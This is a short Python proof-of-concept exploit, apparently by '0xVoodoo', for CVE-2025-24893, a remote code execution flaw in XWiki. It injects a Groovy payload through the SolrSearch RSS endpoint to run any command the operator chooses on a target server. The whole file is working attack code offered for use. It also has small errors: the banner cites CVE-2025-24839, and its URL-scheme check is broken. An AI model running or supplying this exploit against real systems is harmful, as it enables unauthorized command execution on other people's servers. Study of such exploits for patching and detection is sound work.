import requests
import argparse
import urllib.parse

# Pretty colors :)
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
RESET = "\033[0m"

def testVuln(target):
    try:
        resp = requests.get(target)
    except requests.exceptions.RequestException as error:
        print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
        raise SystemExit(error)

    if "xwiki" not in resp.text.lower():
        print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
        return False
    else:
        return True

def exploit(target, cmd):
    payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
    exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' 
    try:
        print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
        resp = requests.get(exploitUrl)
    except requests.exceptions.RequestException as error:
        print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
        raise SystemExit(error)
    print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")


if __name__ == "__main__":
    

    parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
                                     description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
    parser.add_argument('-c', '--command', required=True, help='Command to execute')
    args = parser.parse_args()

    print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
    
    tgt = args.target.lower()
    if tgt[4] != "http" and tgt[5] != "https":
        print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
        tgt = 'http://' + tgt

    if testVuln(tgt):
        exploit(tgt, args.command)
    else:
        raise SystemExit()